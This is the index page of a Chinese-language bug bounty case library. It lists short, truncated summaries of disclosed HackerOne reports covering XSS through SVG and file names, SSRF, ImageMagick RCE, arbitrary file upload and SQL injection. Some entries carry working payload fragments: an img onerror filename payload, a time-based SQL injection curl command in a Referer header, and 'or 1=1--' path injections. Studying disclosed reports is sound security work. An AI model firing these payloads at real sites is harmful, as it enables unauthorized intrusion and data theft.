漏洞赏金案例库


  • 简介
  • 目录大纲
  • 最新文档

    JQ002 上传 svg 文件导致 XSS

    案例:https://hackerone.com/reports/437863 测试过程 1、制作 svg 文件: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105"> <html><head><title>test</title></head><bo……

    myh0st - 2025年5月13日 10:32


    JQ001 FFmpeg 漏洞导致文件读取

    案例:https://hackerone.com/reports/1062888 测试过程 FFmpeg 中的 SSRF-LFR 是一个非常著名且古老的漏洞,起初我无法利用 LFR,只在我的合作服务器中发现了 SSRF。经过一番调查,我发现问题出在文本编辑器在文件末尾添加了换行符 (\r\n) header.m3u8。 此漏洞也会导致 DOS,但我决定不测试此问题。 对于 SSRF 漏洞,你只需要……

    myh0st - 2025年5月13日 10:13


    JQ001 文件上传处的 SSRF

    案例:https://dphoeniixx.medium.com/vimeo-upload-function-ssrf-7466d8630437 测试过程 1、在一个文件上传功能处,参数可以是远程文件的路径 将路径设置为自己的 vps,同样可以访问到,说明存在 ssrf 漏洞,那么接下来需要提高漏洞等级,需要尽可能获取更多内容,造成更大的危害,所以做了以下研究。 2、根据测试,程序的整改流程如图……

    myh0st - 2025年5月13日 09:49


    JQ001 出现在文件名处的 XSS

    案例:https://hackerone.com/reports/1010466 测试过程 1、配置好 burpsuite,上传文件,截取数据包 2、修改文件名为: \"><img src=1 onerror=\"url=String104,116,116,112,115,58,47,47,103,97,116,111,108,111,117,99,111,46,48,48,48,11……

    myh0st - 2025年5月13日 09:33


    JQ002 直接改改后缀上传任意文件

    案例:https://hackerone.com/reports/506646 测试步骤 1、配置好 burpsuite ,上传任意简历图片 2、截断数据包,将 jpg 后缀改为 asp 后,提交,可上传任意后缀的文件

    myh0st - 2025年5月13日 09:29


    JQ001 ImageMagick 漏洞导致 RCE

    案例地址: https://hackerone.com/reports/403417 测试过程 1、作者发现某个目标存在一个上传 logo 的地方,如图; 2、由于 ImageMagick 版本未升级,可以借助 Postscript 来运行 Ghostscript 脚本,从而允许在服务器上触发任意命令,导致远程代码执行。 3、除非 Ghostscript 脚本执行的,还包括 EPS、PS、PD……

    myh0st - 2025年5月13日 09:25


    JQ001 总览

    业务逻辑漏洞分类 登录认证模块 暴力破解测试 测试方法:例如登录,输入账号密码,burp 拦截包发送到 Intruder,把系统变量的 $ 符 clear 掉,给密码加上 add,加载上密码字典,根据返回的长度或者 response 的信息来判断正确密码。 修复方法:一、增加验证码,登录失败的时候,变换验证码。(登录失败,验证码不变不算。验证码工具可识别不算。)二、限制登录频率,例如,5 ……

    myh0st - 2025年4月22日 13:20


    JQ005 Referer 注入

    案例: time curl -s -H "Referer: '+(select*from(select(if(1=1,sleep(20),false)))a)+'" --url "https://████████/█████/Chart01.php?alert="

    myh0st - 2025年4月9日 14:36


    JQ004 路径参数注入

    案例 1 /api/ten-drives/custom-winners/ten_drive_kz_second_weeks/number_trips/1/999%20or%201=1-- /api/ten-drives/custom-winners/ten_drive_kz_second_weeks/number_trips/1/999%20or%201=2-- 案例2 https://corpo……

    myh0st - 2025年4月9日 14:34


    JQ003 Cookie 中 lang 参数 SQL 注入

    GET /index.php/search/default?t=1&x=0&y=0 HTTP/1.1 Host: mtn.com.ye User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml……

    myh0st - 2025年4月9日 14:01



    myh0st